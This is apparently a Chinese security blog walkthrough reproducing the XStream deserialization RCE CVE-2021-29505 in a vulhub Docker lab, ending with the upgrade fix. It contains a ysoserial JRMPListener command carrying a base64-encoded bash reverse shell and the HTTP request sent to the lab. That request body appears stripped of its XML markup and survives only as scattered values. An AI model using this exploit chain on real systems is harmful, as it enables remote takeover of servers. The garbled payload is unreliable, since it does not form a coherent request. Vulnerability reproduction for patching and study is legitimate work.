XStream远程代码执行(CVE-2021-29505 )
一、简介描述
XStream是一种OXMapping技术,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。攻击者可以操纵已处理的输入流并替换或注入对象,从而执行从远程服务器加载的任意代码。
二、影响版本:
XStream <= 1.4.16
三、环境搭建:
https://raw.githubusercontent.com/vulhub/vulhub/master/xstream/CVE-2021-29505/docker-compose.yml
文件:docker-compose.yml
version: '2'
services:
web:
image: vulhub/xstream:1.4.16
ports:
- "8080:8080"
docker-compose up -d
镜像已经启动:
访问地址:http://192.168.0.106:8080/
四、漏洞复现
启动服务:
反弹目标需要base64加密:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,L2Jpbi9iYxxxxxxxxPiYx}|{base64,-d}|{bash,-i}"
执行过程截图:
执行poc:
获取反弹shell:
详细数据包:
POST / HTTP/1.1
Host: 192.168.0.106:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 3115
2
3
12345
com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content
12345
true
SOAP_11
false
aa
aa
UnicastRef
192.168.0.102
1098
0
0
0
0
false
192.168.0.102
1098
五、漏洞修复:
将xstream升级到1.4.17或以上版本。(在maven的/pom.xml中替换高版本xstream)
com.thoughtworks.xstream
xstream
1.4.17
参考:
https://mp.weixin.qq.com/s/dh7Ewg7Pp-pg3mkLuUv9Rg
https://blog.csdn.net/weixin_45728976/article/details/116942969
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
如果本文内容侵权或者对贵公司业务或者其他有影响,请联系作者删除。
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
欢迎添加本公众号作者微信交流,添加时备注一下“公众号”